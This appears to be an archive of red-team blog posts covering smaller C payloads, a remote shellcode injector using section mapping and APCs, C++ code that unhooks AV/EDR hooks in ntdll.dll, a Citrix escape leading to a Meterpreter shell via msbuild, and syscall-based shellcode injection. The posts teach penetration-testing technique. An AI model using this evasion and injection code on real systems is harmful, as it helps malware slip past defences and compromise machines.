As I’ve said already, I really liked this course. I picked up new knowledge and skills that I can immediately use at work, I have solid code samples to build from, and it didn’t break the bank. You can’t ask for much more from an offensive security course. Props again to reenz0h and the Sektor7 crew. I’m really hoping there will be an advanced course and beyond in the future.

Smaller C Payloads on Windows

25 September 2020 at 15:20

Smaller C Payloads on Window

Introduction

Many thanks to 0xPat for his post on malware development, which is where the inspiration for this post came from.

When writing payloads for use in penetration tests or red team engagements, smaller is generally better. No matter the language you use, there is always a certain amount of overhead required for running a binary, and in the case of C, this is the C runtime library, or CRT. The C runtime is “a set of low-level routines used by a compiler to invoke some of the behaviors of a runtime environment, by inserting calls to the runtime library into compiled executable binary. The runtime environment implements the execution model, built-in functions, and other fundamental behaviors of a programming language”. On Windows, this means the various *crt.lib libraries that are linked against when you use C/C++. You might be familiar with the common compiler flags /MT and /MTd, which statically link the C runtime into the final binary. This is commonly done when you don’t want to rely on using the versioned Visual C++ runtime that ships with the version of Visual Studio you happen to be using, as the target machine may not have this exact version. In that case you would need to include the Visual C++ Redistributable or somehow have the end user install it. Clearly this is not an ideal situation for pentesters and red teamers. The alternative is to statically link the C runtime when you build your payload file, which works well and does not rely on preexisting redistributables, but unfortunately increases the size of the binary.

How can we get around this?

Introducing msvcrt.dll

msvcrt.dll is a copy of the C runtime which is included in every version of Windows from Windows 95 on. It is present even on a fresh install of Windows that does not have any additional Visual C++ redistributables installed. This makes it an ideal candidate to use for our payload. The trick is how to reference it. 0xPat points to a StackOverflow answer that describes this process in rather general terms, but without some tinkering it is not immediately obvious how to get it working. This post is aimed at saving others some time figuring this part out (shout out to AsaurusRex!).

Creating msvcrt.lib

The idea is to find all the functions that msvcrt.dll exports and add them to a library file so the linker can reference them. The process flow is to dump the exports into a file with dumpbin.exe, parse the results into .def format, which can then be converted into a library file with lib.exe. I have created a GitHub gist here that contains the commands to do this. I use Windows for dumping the exports and creating the .lib file, and Linux to do some text processing to create the .def file. I won’t go over the steps here in detail here as they are well commented in the gist.

Some Caveats

It is important to note that using msvcrt.dll is not a perfect replacement for the full C runtime. It will provide you with the C standard library functions, but not the full set of features that the runtime normally provides. This includes things like initializing everything before calling the usual main function, handling command line arguments, and probably a lot of other stuff I have not yet run into. So depending on how many features of the runtime you use, this may or may not be a problem. C++ will likely have more issues than pure C, as many C++ features involving classes and constructors are handled by the runtime, especially during program initialization.

Using msvcrt.lib

Using msvcrt.lib is fairly straight forward, as long as you know the proper compiler and linker incantations. The first step is to define _NO_CRT_STDIO_INLINE at the top of your source files. This presumably disables the use of the CRT, though I’ve not seen this explicitly defined by Microsoft anywhere. I have noticed that this definition alone is not enough. There are several compiler and linker flags that need to be set as well. I will list them here in the context of C/C++ Visual Studio project settings, as well as providing the command line argument equivalents.

Visual Studio Project Settings

  • Linker settings:
    • Advanced -> Entrypoint -> something other than main/wmain/WinMain etc.
    • Input -> Ignore All Default Libraries -> YES
    • Input -> Additional Dependencies -> add the custom msvcrt.lib path, kernel32.lib, any other libraries you may need, like ntdll.dll
  • Compiler settings:
    • Code Generation -> Runtime Library -> /MT
    • Code Generation -> /GS- (off)
    • Advanced -> Compile As -> /TC (only if you’re using C and not C++)
    • All Options -> Basic Runtime Checks -> Default

cl.exe Settings

cl.exe /MT /GS- /Tc myfile.c /link C:\path\to\msvcrt.lib "kernel32.lib" "ntdll.lib" /ENTRY:"YourEntrypointFunction" /NODEFAULTLIB

Some notes on these settings. You must have an entrypoint that is not named one of the standard Windows C/C++ function names, like main or WinMain. These are used by the C runtime, and as the full C runtime is not included, they cannot be used. Likewise, runtime buffer overflow checks (/GS) and other runtime checks are part of the C library and so not available to us.

If you plan on using command line arguments, you can still do so, but you’ll need to use CommandLineToArgvW and link against Shell32.lib.

Conclusion

Using this method I’ve seen a size reduction from 8x-12x in the resulting binary. I hope this post can serve as helpful documentation for others trying to get this working. Feel free to contact me if you have any issues or questions, and especially if you have any improvements or better ways of accomplishing this.

SeasideBishop: A C port of the UrbanBishop shellcode injector

3 September 2020 at 15:20

SeasideBishop: A C port of b33f’s UrbanBishop shellcode injector

Introduction

This post covers a recent C port I wrote of b33f’s neat C# shellcode loader UrbanBishop. The prolific Rastamouse also did a veriation of UrbanBishop, using D/Invoke, called RuralBishop. This injection method has some quirks I hadn’t seen done before, so I thought it would be interesting to port it to C.

Credit of course goes to b33f, Rastamouse as well, and special thanks to AsaurusRex and Adamant for their help in getting it working.

The code for this post is available here.

The Code

First, a quick outline of the injection method, and then I will break it down API by API. SeasideBishop creates a section and maps a view of it locally, opens a handle to a remote process, maps a view of that same section into the process, and copies shellcode into the local view. As as view of the same section is also mapped in the remote process, the shellcode has now been allocated across processes. Next a remote thread is created and an APC is queued on it. The thread is alerted and the shellcode runs.

Opening The Remote Process

get-pid

Above we see the use of the native API NtOpenProcess to acquire a handle to the remote process. Native APIs calls are used throughout SeasideBishop as they tend to be a bit more stealthy than Win32 APIs, though they are still vulnerable to userland hooking.

Sections

A neat feature of this technique is the way that the shellcode is allocated in the remote process. Instead of using a more common and suspicious API like WriteProcessMemory, which is well known to AV/EDR products, SeasideBishop takes advantage of memory mapped files. This is a way of copying some or all of a file into memory and operating on it there, rather than manipulating it directly on disk. Another way of using it, which we will do here, is as an inter-process communication (IPC) mechanism. The memory mapped file does not actually need to be an ordinary file on disk. It can be simply a region of memory backed by the system page file. This way two processes can map the same region in their own address space, and any changes are immediately accessible to the other.

The way a region of memory is mapped is by calling the native API NtCreateSection. As the name indicates, a section, or section object, is the term for the memory mapped region.

create-section

Above is the call to NtCreateSection within the local process. We create a section with a size of 0x1000, or 4096 bytes. This is enough to hold our demo shellcode, but might need to be increased to accommodate a larger payload. Note that the allocation will be rounded up to the nearest page size, which is normally 4k.

The next step is to create a view of the section. The section object is not directly manipulated, as it represents the file-backed region of memory. We create a view of the section and make changes to that view. The remote process can also map a view using the same section handle, thereby accessing the same section. This is what allows IPC to happen.

local-map-section

Here we see the call to NtMapViewOfSection to create the view in the local process. Notice the use of RW and not RWX permissions, as we simply need to write the shellcode to the view.

memcpy

Next a simple memcpy writes our shellcode to the view.

remote-map-section

Finally we map a view of the same section in the remote process. Note that this time we use RX permissions so that the shellcode is executable. Now we have our shellcode present in the remote process’s memory, without using APIs like WriteProcessMemory. Now let’s work on executing it.

Starting From The End

In order to execute our shellcode in the remote process, we need a thread. In order to create one, we need to give the thread a function or address to begin executing from. Though we are not using Win32 APIs, the documentation for CreateRemoteThreadEx still applies. We need a “pointer to [an] application-defined function of type LPTHREAD_START_ROUTINE to be executed by the thread and [serve as] the starting address of the thread in the remote process. The function must exist in the remote process.” The function we will use is RtlExitUserThread. This is not a very well documented function, but debugging indicates that this function is part of the thread termination process. So if we tell our thread to begin executing at this function, we are guaranteed that the thread will exit gracefully. That’s always a good thing when injecting into remote processes.

So now that we know the thread will exit, how do we get it to execute our code? We’ll get there soon, but first we need to get the address of RtlExitUserThread so that we can use it as the start address of our new remote thread.

function-address

There’s a lot going on here, but it’s really pretty simple. RtlExitUserThread is exported by ntdll.dll, so we need the DLL base address first before we can access its exports. We create the Unicode string needed by the LdrGetDllHandle native API call and then call it to get the address of ntdll.dll. With that done, we need to create the ANSI string required by LdrGetProcedureAddress to get the address of the RtlExitUserThread function. Again, notice no suspicious calls to LoadLibrary or GetProcAddress here.

Creating The Thread

Now that we have our thread start address, we can create it in the remote process.

create-remote-thread

Here we have the call to NtCreateThreadEx that creates the thread in the target process. Note the use of the pRemoteFunction variable, which contains the start address of RtlExitUserThread. Note also that the true argument above is a Boolean value for the CreateSuspended parameter, which means that the thread will be created in a suspended state and will not immediately begin executing. This will give us time to tell it about the shellcode we’d like it to run.

Execution

We’re in the home stretch now. The shellcode is in the remote process and we have a thread ready to execute it. We just need to connect the two together. To do that, we will queue an Asynchronous Procedure Call (APC) on the remote thread. APCs are a way of asynchronously letting a thread know that we have work for it to do. Each thread maintains an APC queue. When the thread is next scheduled, it will check that queue and run any APCs that are waiting for it, and then continue with its normal work. In our case, that work will be to run the RtlExitUserThread function and therefore exit gracefully.

queue-apc

Here we see how the thread and our shellcode meet. We use NtQueueApcThread to queue an APC onto the remote thread, using lpRemoteSection to point to the view containing the shellcode we mapped into the remote process earlier. Once the thread is alerted, it will check its APC queue and see our APC waiting for it.

alert-thread

A quick call to NtAlertResumeThread and the thread is alerted and runs our shellcode. Which of course pops the obligatory calc.

calc

Conclusion

I thought this was a neat injection method, with some quirks I hadn’t seen before, and I enjoyed porting it over to C and learning the concepts behind it in more detail. Hopefully others will find this useful as well.

Thanks again to b33f, Rasta, Adamant, and AsaurusRex for their help!

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a systemcall to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 1, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

handle hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what were are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the hookedSectionHeader->VirtualAddress address of the .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes )

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize)

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax and a number instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Escaping Citrix Workspace and Getting Shells

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to and RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel presented over the network onto our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

1
2
3
Sub X()
    Shell "CMD /K/ %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked the by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard or impossible to present VB and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

Using Syscalls to Inject Shellcode on Windows

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into. One is using native Windows system calls (AKA syscalls), or using Dynamic Invocation. Each have their pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly the changing the assembly of commonly abused API calls to jump to AV/EDR controlled code, where it is then inspected, and assuming the call is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files, in this case MSDN tells us in Kernel32.dll. These are user-mode DLLs, which mean they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. This API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernell32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason it exists is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system. So the way it is able to access lower-level functionality is through native PIs. But if the native APIs still have to call yet lower level APIs, why not got straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs with out affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easist way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re looking for (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern, in that some arguments are setup on the stack, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed on in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and start the thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

